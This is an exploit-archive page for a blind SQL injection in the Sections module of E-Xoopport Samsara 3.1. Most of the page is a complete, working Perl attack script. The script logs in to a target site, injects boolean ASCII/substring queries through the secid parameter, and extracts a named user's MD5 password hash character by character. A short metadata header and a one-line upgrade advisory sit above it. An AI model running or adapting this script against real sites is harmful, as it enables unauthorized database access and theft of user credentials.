header-logo
Suggest Exploit
vendor:
Samsara
by:
_mRkZ_ & Dante90, WaRWolFz Crew
8,8
CVSS
HIGH
Remote Blind SQL Injection
89
CWE
Product Name: Samsara
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: YES
Related CWE: N/A
CPE: a:exoopport:samsara:3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

[0-Day] E-Xoopport – Samsara <= v3.1 (Sections Module 2) Remote Blind SQL Injection Exploit

E-Xoopport is vulnerable to a Remote Blind SQL Injection vulnerability in the Sections Module. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. This vulnerability affects versions 3.1 and earlier.

Mitigation:

Upgrade to the latest version of E-Xoopport, or apply the appropriate patch.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# [0-Day] E-Xoopport - Samsara <= v3.1 (Sections Module 2) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_ & Dante90, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Web Site: www.warwolfz.org

use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;

$^O eq 'MSWin32' ? system('cls') : system('clear');

print "
E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (Sections Module) |
| Author/s: _mRkZ_ & Dante90, WaRWolFz Crew         |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
";

if (@ARGV != 4) {
	print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n";
	exit;
}

$host    = $ARGV[0];
$usr     = $ARGV[1];
$pwd     = $ARGV[2];
$anickde = $ARGV[3];
$anick   = '0x'.EncHex($anickde);

print "[+] Logging In...\r\n";
my %postdata = (
	uname => "$usr",
	pass => "$pwd"
);
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req		= (POST $host, \%postdata);
my $cookies = HTTP::Cookies->new();
$request	= $ua->request($req);
$ua->cookie_jar($cookies);
$content	= $request->content;
if ($content =~ /<head><meta http-equiv="Refresh" content="0; URL=modules\/news\/" \/><\/head>/i) {
	print "[+] Logged in\r\n";
} else {
	print "[-] Fatal Error: username/password incorrect?\r\n";
	exit;
}

print "[!] Retriving section id...\r\n";
$idi = 0;
while ($idi != 11) {
	$idi++;
	$ua = LWP::UserAgent->new;
	$ua->agent("Mozilla 5.0");
	my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$idi";
	$request	= $ua->get($req);
	$ua->cookie_jar($cookies);
	$content	= $request->content;
	if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
		$secid = $idi;
		last;
	}
}

if(!defined $secid) {
	print "[-] Fatal Error: Section id not found!\r\n";
	exit;
} else {
	print "[+] Section id '$secid' retrieved\r\n";
}

print "[!] Checking path...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid";
$request	= $ua->get($req);
$ua->cookie_jar($cookies);
$content	= $request->content;
if ($content =~ /Ecco i documenti della sezione/i) {
	print "[+] Correct Path\r\n";
} else {
	print "[-] Fatal Error: Wrong Path\r\n";
	exit;
}

print "[!] Checking if vulnerability has been fixed...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+1=1";
$request	= $ua->get($req);
$ua->cookie_jar($cookies);
$content	= $request->content;
if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
	print "[+] Vulnerability has not been fixed...\r\n";
} else {
	print "[-] Fatal Error: Vulnerability has been fixed\r\n";
	open LOGG, ">log.html";
	print LOGG $content;
	close LOGG;
	exit;
}

print "[!] Checking nick to hack...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),32,1))>0";
$request	= $ua->get($req);
$ua->cookie_jar($cookies);
$content	= $request->content;
if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
	print "[+] Nick exists...\r\n";
} else {
	print "[-] Fatal Error: Nick does not exists\r\n";
	exit;
}

print "[!] Exploiting...\r\n";
my $i = 1;
while ($i != 33) {
	my $wn	= 47;
	while (1) {
		$wn++;
		$ua = LWP::UserAgent->new;
		$ua->agent("Mozilla 5.0");
		my $req		= $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
		$request	= $ua->get($req);
		$ua->cookie_jar($cookies);
		$content	= $request->content;
		if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
			$pwdchr .= chr($wn);
			$^O eq 'MSWin32' ? system('cls') : system('clear');
			PrintChars($anickde, $pwdchr, $secid);
			last;
		}
	}
	$i++;
}

print "\r\n[+] Exploiting completed!\r\n\r\n";
print "Visit: www.warwolfz.net\r\n\r\n";

sub PrintChars {
$anick1 = $_[0];
$chars = $_[1];
$secid = $_[2];
print "
E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (Sections Module) |
| Author/s: _mRkZ_ & Dante90, WaRWolFz Crew         |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
[+] Logging In...
[+] Logged in
[!] Retriving section id...
[+] Section id '$secid' retrived
[!] Checking path...
[+] Correct Path
[!] Checking if vulnerability has been fixed...
[+] Vulnerability has not been fixed...
[!] Checking nick to hack...
[+] Nick exists...
[!] Exploiting...
[+] ".$anick1."'s md5 Password: $chars
";
}

sub EncHex {
	$char = $_[0];
	chomp $char;
	@trans = unpack("H*", "$char");
	return $trans[0];
}

Navigation

Suggest Exploit

Services By CQR